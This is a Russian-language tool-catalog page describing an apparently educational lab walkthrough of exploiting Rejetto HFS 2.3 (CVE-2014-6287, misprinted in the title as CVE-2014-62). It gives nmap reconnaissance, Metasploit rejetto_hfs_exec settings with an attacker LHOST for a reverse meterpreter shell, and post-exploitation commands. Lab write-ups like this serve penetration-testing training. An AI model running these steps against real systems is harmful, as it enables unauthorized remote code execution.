Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
HFS_EXPLOIT_PROJECT — Metasploit RCE на HFS 2.3 - CVE-2014-62 | Kitploit
Инструменты/GitHubGitHub/sage954526/hfs_exploit_project
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubsage954526/hfs_exploit_project

HFS_EXPLOIT_PROJECT

Metasploit RCE на HFS 2.3 - CVE-2014-62

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

HFS_EXPLOIT_PROJECT

Metasploit RCE на HFS 2.3 - CVE-2014-62

🔖 Название проекта

root@kitploit:~
> Удаленное выполнение кода через HTTP File Server (HFS 2.3)

⚙ Используемые инструменты • Kali Linux • Nmap • Metasploit • Цель: HFS 2.3 на Windows 7

🔐 Детали уязвимости • Название: CVE-2014-6287 • Тип: удаленное выполнение кода • Причина: непроверенный ввод в скриптах HFS • Воздействие: неаутентифицированный доступ к оболочке

🔍 Методология (пошагово)

🔹 Шаг 1: Сбор информации (Nmap)

root@kitploit:~
•    nmap -sV demo.ine.local (ip целевой машины) 
•    обнаружен открытый порт: 80
•    сервис: rejetto HTTP file server 2.3

Сканирование Nmap

Nmap

🔹 Шаг 2: Эксплуатация (Metasploit)

root@kitploit:~
• Msfconsole
• Поиск HFS или rejetto
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run

Настройка эксплойта

Эксплойт Эксплойт

🔹 Шаг 3: Пост-эксплуатация

После запуска вы получите сессию meterpreter используйте команду: shell

• whoami • ipconfig • dir

Доступ к оболочке

Оболочка

Оболочка**

Скачать инструмент